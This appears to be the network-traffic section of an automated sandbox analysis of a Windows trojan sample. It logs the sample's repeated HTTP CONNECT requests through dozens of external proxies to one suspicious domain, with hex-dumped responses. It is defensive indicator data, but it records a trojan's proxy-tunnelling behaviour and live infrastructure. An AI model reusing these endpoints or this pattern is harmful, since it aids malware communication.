                                                                                Feb 23, 2024 14:28:38.739523888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.730587006 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1588192.168.2.854610120.77.148.13880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.741638899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.946701050 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.23.3
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.3</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1589192.168.2.854643175.183.82.22181935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.741805077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1590192.168.2.854653171.248.222.6010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.757678986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1591192.168.2.85451936.67.77.4131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.775032997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1592192.168.2.85440020.193.135.50805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.779082060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1593192.168.2.854726178.128.157.1144435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.785213947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1594192.168.2.854729178.128.157.1144435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.786305904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1595192.168.2.854731178.128.157.1144435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.787444115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1596192.168.2.854732178.128.157.1144435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.788315058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1597192.168.2.854694184.185.2.1241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.814944983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1598192.168.2.854688103.216.50.22580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.815181017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.164575100 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1599192.168.2.85089745.125.222.125472395828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.864181995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1600192.168.2.854449162.241.46.54468495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.865371943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898175955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992216110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1601192.168.2.850789107.148.201.157805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.879874945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.882586956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992089033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1602192.168.2.8510185.252.23.22010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.879986048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1603192.168.2.853649104.238.111.10754525828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.919589043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.397908926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.858772993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1604192.168.2.854768104.16.109.213805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.923624039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.011363983 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1605192.168.2.854804104.16.143.127805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.955126047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.042674065 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1606192.168.2.854811104.20.198.49805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.958605051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.049360037 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1607192.168.2.85471085.14.8.22680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.972600937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1608192.168.2.854822104.20.75.31805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:38.972795010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.061058044 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1609192.168.2.854746104.129.199.3488005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.000703096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.156003952 CET125INHTTP/1.1 407 Unauthorized
                                                                                Server: Zscaler/6.2
                                                                                Cache-control: no-cache
                                                                                Content-Length: 0
                                                                                Proxy-Authenticate: Negotiate


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1610192.168.2.854448115.171.217.4878915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.000724077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1611192.168.2.85473691.121.89.4180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.000916958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:14.157390118 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1612192.168.2.85097751.222.241.157462865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.000965118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.064800024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.162976027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.179132938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1613192.168.2.85101251.75.126.150218035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.001096964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1614192.168.2.854747185.143.234.2880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.001099110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.165882111 CET389INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 150
                                                                                Connection: close
                                                                                Server: ArvanCloud
                                                                                Server-Timing: total;dur=0
                                                                                X-Request-ID: 413579e0fa14ae7d7729ad233518e15c
                                                                                X-SID: 6233
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1615192.168.2.85477738.46.222.6031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.014956951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1616192.168.2.85442347.90.126.7881185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.014956951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.384149075 CET132INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.
                                                                                Feb 23, 2024 14:28:43.882531881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1617192.168.2.85425047.206.214.4543215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.031232119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1618192.168.2.85477091.134.140.16054015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.031383038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.548105955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.124257088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1619192.168.2.85479072.37.217.341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.036017895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1620192.168.2.854847184.170.245.14841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.047013998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
